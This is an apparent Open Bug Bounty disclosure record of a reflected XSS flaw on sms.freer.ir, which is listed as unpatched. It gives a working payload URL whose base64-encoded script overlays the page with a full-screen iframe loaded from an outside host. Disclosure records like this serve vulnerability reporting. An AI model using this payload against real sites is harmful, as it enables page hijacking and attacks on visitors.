sms.freer.ir XSS vulnerability

2015-07-08T12:00:00
ID OBB:70576
Type openbugbounty
Reporter sToRm
Modified 2015-07-08T12:03:00

Description

Vulnerable URL:
http://sms.freer.ir/gateway/index.php/1%22%3E%3C/a%3E%3C/div%3E%3Cscript%3Ealert%28%22XSSPOSED%22%29;document.write%28atob%28%27PGlmcmFtZSBzdHlsZT0icG9zaXRpb246Zml4ZWQ7dG9wOjA7bGVmdDowO3dpZHRoOjEwMCU7bWluLWhlaWdodDoxMDAwcHg7aGVpZ2h0OjEwMCU7Ym9yZGVyOm5vbmU7ei1pbmRleDo5OTkiIHNyYz0iaHR0cDovL3d3dy5zaWNoZXJoZWl0LW9ubGluZS5vcmcveHRlcm5hbC9zdG9ybS5odG1sIj48L2lmcmFtZT4=%27%29%29;%3C/script%3E%3C!--

Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 25.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| Unknown / Not calculated
Google Pagerank| 2
VIP website status:| No
Check sms.freer.ir SSL connection:| (Grade: C)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 8 July, 2015 12:00 GMT
Vulnerability existence verified and confirmed| 8 July, 2015 12:03 GMT